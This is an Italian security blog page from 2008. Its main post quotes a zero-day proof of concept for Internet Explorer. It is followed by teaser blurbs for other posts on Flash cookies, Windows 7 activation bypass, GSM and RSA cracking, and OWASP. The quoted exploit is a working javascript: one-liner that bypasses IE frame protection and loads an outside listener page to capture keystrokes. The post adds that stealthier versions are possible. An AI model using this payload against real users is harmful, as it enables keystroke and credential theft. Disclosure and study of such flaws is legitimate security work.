Paranoia is a virtue
Ghost Busters: Zero-day flaw haunts Internet Explorer
This way, we bypass IE’s protection and set our desired location without any problems. And the final exploit goes like this:
javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return 'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);
What caballero-listener does is just focusing itself, so it can catches onkeydown events.. there are a lot of ways of making the same thing in more stealth mode.
Vi fornisco direttamente il digest 
| Print article | This entry was posted by Andrea L. on 25 July 2008 at 12:39, and is filed under hacking, sicurezza, vulnerabilità. Follow any responses to this post through RSS 2.0. You can leave a response or trackback from your own site. |
No comments yet.
No trackbacks yet.
Spie russe – Cosa ci insegnano sulla security?
about 2 months ago - 1 comment
Spie, a memoria credo che sia la prima volta che ascolto una notizia del genere, ma forse sono troppo “piccolo” per ricordare di notizie di guerra fredda nei TG nostrani, ho seguito un pò di straforo la questione dei 10 arresti e delle vicende annesse spizzicando qua e la e non ho potuto veramente fare a
Flash rimuovere i cookie è importante per la nostra privacy
about 2 months ago - 3 comments
Non tutti sanno che anche il buon vecchio e caro (si fa per dire) Adobe Flash ha al suo interno un sistema alternativo (o complementare) per la gestione dei cookie con qualche caratteristica (aggravante) in più rispetto ai “biscottini” che tutti dovremmo conoscere. Tali “jumbo cookie”, o come ama chiamarli Adobe LSO (Local Shared Object),
Attivare Windows7 – Disabilitare il WAT con removeWAT
about 7 months ago - No comments
Parleremo di WAT – Windows Activation Technology, SPP – Software Protection Platform e SLC – Software Licensing Client e di come girare intorno alla questione attivazione almeno fino al prossimo aggiornamento Microsoft. Abbiamo già parlato in precedenza di come fosse possibile attivare vista o crackare windows7 giocherellando con il bios e le SLIC table di ACPI,
GSM cypher is Gone! Crackato! Kaput!
about 7 months ago - 3 comments
Forse è il segreto di pulcinella, ma qualora fosse passato inosservato vi comunico che l’algoritmo di cypher alla base dell’encoding delle comunicazioni GSM è andato a farsi f…friggere! Don’t Panic? Parliamone! Ogni anno alla CCC – Chaos Communication Congress ne succedono delle belle. La 26th edizione (26C3) non è stata da meno regalandoci la chicca
NOMFET: transistor organici e neuro-inspired computer
about 7 months ago - No comments
Un’idea che non sia pericolosa, è indegna di chiamarsi idea (Oscar Wilde) Non si deve mai aver paura delle proprie idee, anche quando queste sembrano strampalate o deportate pari pari da un film di fantascienza. Poco più di due anni fa ho voluto scrivere qualche riga su questo blog in merito all’intelligenza artificiale forte argomento
OWASP T10 2010 ed il mondo che verrà
about 7 months ago - No comments
OWASP (Open Web Application Security Project) ha pubblicato un significativo aggiornamento alla lista dei TOP 10 “Most Critical Web Application Security Risks” Questa versione spicca per la chiarezza con cui sono stati esposti i vari punti e per come i vari “classificati” siano stati analizzati pesando tutti i fattori che entrano in gioco nell’analisi del
Google alla Cina: STOP alla cesura
about 7 months ago - No comments
Con poche e concitate parole Google dice stop alla censura sul suo google.cn rompendo gli accordi con il regime di Beijing. La decisione è stata presa dopo l’ennesimo attacco mirato avvenuto ai danni di BigG e di altre, stando all’articolo, 20 grandi aziende statunitensi Google fu chiara all’inaugurazione della versione localizzata del suo motore di
Backtrack 4 Final: pwnsauce è tra noi
about 7 months ago - No comments
Ed eccola qui in tutto il suo splendore Debian Based, prima la beta p0i la pre-final e ora le versione definitiva (ma andrebbe tra apici) Non aggiungo nient’altro perché se veramente non la conoscete, beh mi spiace per voi! XD Scherzi a parte rinnovo l’invito, agli appassionati, di fare un salto su Server: irc.freenode.net Room
Crittoanalisi: altro scossone 768-bit RSA crackato
about 7 months ago - No comments
Il 6 Luglio scorso inauguravo la mia personale “Cryptanalysis season“. A distanza di 6 mesi dai due lavori che hanno affondato un tagliente stiletto nei fianchi di chi riteneva che AES e SHA-3 fossero il non plus ultra della sicurezza nelle trasmissioni digitali, mi ritrovo a dare la notizia dello scacco avvenuto ai danni del re, RSA.
str0ke has passed away – R.I.P.
about 10 months ago - 6 comments
Prima rGod ora str0ke… ragazzi troppo giovani per morire… Un altro Generale ci lascia! Rest in peace, str0ke… we’ll miss you brotha. Funeral is this Friday Addio…
